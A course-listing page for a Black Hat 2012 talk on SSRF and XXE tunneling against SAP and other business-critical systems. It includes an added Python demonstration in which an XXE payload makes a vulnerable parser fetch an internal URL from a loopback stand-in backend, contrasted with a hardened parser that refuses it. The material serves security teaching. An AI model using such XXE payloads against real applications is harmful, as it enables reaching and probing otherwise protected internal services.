
SSRF vs Business Critical Applications

Offered By: Black Hat via YouTube

Tags

Black Hat Courses
Cybersecurity Courses
Penetration Testing Courses
Server-Side Request Forgery (SSRF) Courses
Security Vulnerabilities Courses

Course Description

Overview

Explore Server-Side Request Forgery (SSRF) attacks and their impact on business-critical applications in this Black Hat USA 2012 conference talk. Delve into SSRF vulnerabilities, with a focus on XXE Tunneling, and learn how these techniques bypass multiple layers of security defenses. Discover how attackers abuse a trusted source (an application server that the rest of the network trusts) to reach otherwise secured systems, using SAP as a practical example. Examine SSRF vulnerabilities that enable internal network port scanning, unauthorized HTTP requests, and brute-forcing of backend services. Gain insights into the XXE Tunneling technique, in which a vulnerable XML parser is used to relay attacker-crafted requests to internal services, and its potential to reopen old attack vectors and create new ones in business-critical systems. Learn about the OWASP-EAS project's XXEScanner tool, designed to gather information, scan, and attack vulnerable hosts or backends. Understand the implications of these attacks for enterprise resource planning (ERP) systems, portals, business intelligence platforms, and industrial control systems.
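The following is an added example, not code from the talk, from ERPScan, or from the OWASP-EAS project. It shows the primitive that turns XXE into SSRF: an XML parser configured to resolve external general entities fetches an attacker-chosen URL from the server's own network position, and the response body lands inside the parsed document. It uses Python's standard-library xml.sax parser with the external-general-entities feature switched on (the default before Python 3.7.1) against a constructed loopback HTTP server that stands in for an internal backend; the hostnames, the /admin/status path, and the response body are invented for the demonstration. The same payload is then parsed with the feature off to show the hardened behaviour.

```python
"""
XXE used as an SSRF primitive (added example, not from the talk).

A business application parses attacker-controlled XML. If its parser
resolves external general entities, a SYSTEM entity pointing at a host
that only the application server can reach makes the server issue the
HTTP request on the attacker's behalf. The "internal backend" here is a
constructed loopback HTTP server; all names in this file are hypothetical.
"""
import io
import os
import threading
import xml.sax
from http.server import BaseHTTPRequestHandler, HTTPServer
from xml.sax import handler


class InternalBackend(BaseHTTPRequestHandler):
    """Stand-in for a service on the internal network (constructed)."""
    requests_seen = []  # request paths, shared by all handler instances

    def do_GET(self):
        InternalBackend.requests_seen.append(self.path)
        body = b"internal-status: ok"  # constructed plain-text reply
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_backend():
    """Bind the constructed backend on a free loopback port."""
    server = HTTPServer(("127.0.0.1", 0), InternalBackend)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def attacker_xml(internal_url):
    """XML an attacker submits to the application's XML endpoint."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE order [\n"
        f'  <!ENTITY xxe SYSTEM "{internal_url}">\n'
        "]>\n"
        "<order><note>&xxe;</note></order>"
    ).encode()


class TextCollector(handler.ContentHandler):
    """Collects character data, i.e. what the app would echo or store."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


class RefuseExternalEntities(handler.EntityResolver):
    """Defence in depth: fail loudly if anything ever asks to resolve one."""
    def resolveEntity(self, publicId, systemId):
        raise ValueError(f"external entity refused: {systemId}")


def parse(xml_bytes, resolve_external_entities):
    """Parse with the vulnerable (True) or hardened (False) configuration."""
    parser = xml.sax.make_parser()
    collector = TextCollector()
    parser.setContentHandler(collector)
    # True: the stdlib parser fetches SYSTEM entities with urllib, so the
    # server performs the request. False: the entity is silently dropped
    # and no request is made (the resolver below never even runs).
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    if not resolve_external_entities:
        parser.setEntityResolver(RefuseExternalEntities())
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def run_demo():
    """Feed the same payload to a vulnerable and a hardened parser."""
    os.environ["no_proxy"] = "127.0.0.1"  # keep urllib off any HTTP proxy
    server, port = start_backend()
    try:
        InternalBackend.requests_seen.clear()
        payload = attacker_xml(f"http://127.0.0.1:{port}/admin/status")
        leaked = parse(payload, resolve_external_entities=True)
        hits_vulnerable = list(InternalBackend.requests_seen)
        safe = parse(payload, resolve_external_entities=False)
        hits_hardened = list(InternalBackend.requests_seen)
    finally:
        server.shutdown()
        server.server_close()
    return {
        "leaked": leaked,                    # "internal-status: ok"
        "hits_vulnerable": hits_vulnerable,  # ["/admin/status"]
        "safe": safe,                        # ""
        "hits_hardened": hits_hardened,      # unchanged: no second request
    }


if __name__ == "__main__":
    print(run_demo())
```

The backend's response body comes back as the text of the note element, which is what makes XXE a read-capable SSRF rather than a blind one. The port-scanning variant mentioned above relies on the same resolution step: whether the parser raises a connection error, a malformed-entity error, or hangs tells the attacker whether an internal port is closed, open but not speaking XML, or filtered.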

Syllabus

Intro
ERPScan
Enterprise applications: Definitions
Business-critical systems architecture
Secure corporate network
Corporate network attack scenario
SSRF History: Basics
SSRF history: World research
Trusted SSRF: Oracle Database
SSRF Types: SAP
Remote SSRF: Subtypes
Simple Remote SSRF: Login bruteforce
XXE Attacks on other services
Full Remote SSRF
Remote SSRF threats
XXE Tunneling to Verb Tampering
XXE Tunneling to Buffer Overflow (Hint 2)
XXE Tunneling to Buffer Overflow: Packet B
XXE Tunneling to Buffer Overflow (Hint 3)
XXE Tunneling to Rsh
Bypass SAP security restrictions
SAP Gateway server security bypass: Exploit
SAP Message Server security bypass
Oracle DB security bypass
Conclusion?
Purpose
How is it working?
Few steps
Action: Test
Action: Scan
Action: Attack
DEMO


Taught by

Black Hat

Related Courses

OWASP Top 10 - A10:2021 - Server-Side Request Forgery (SSRF)
Cybrary
Popular Web Attacks - XSS, CSRF, SSRF, SQL Injection, MIME Sniffing, Smuggling and More
Hussein Nasser via YouTube
API-Induced SSRF - How Apple Pay Scattered Vulnerabilities Across the Web
Black Hat via YouTube
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages
Black Hat via YouTube
SSRF PWNs - New Techniques and Stories
Hack In The Box Security Conference via YouTube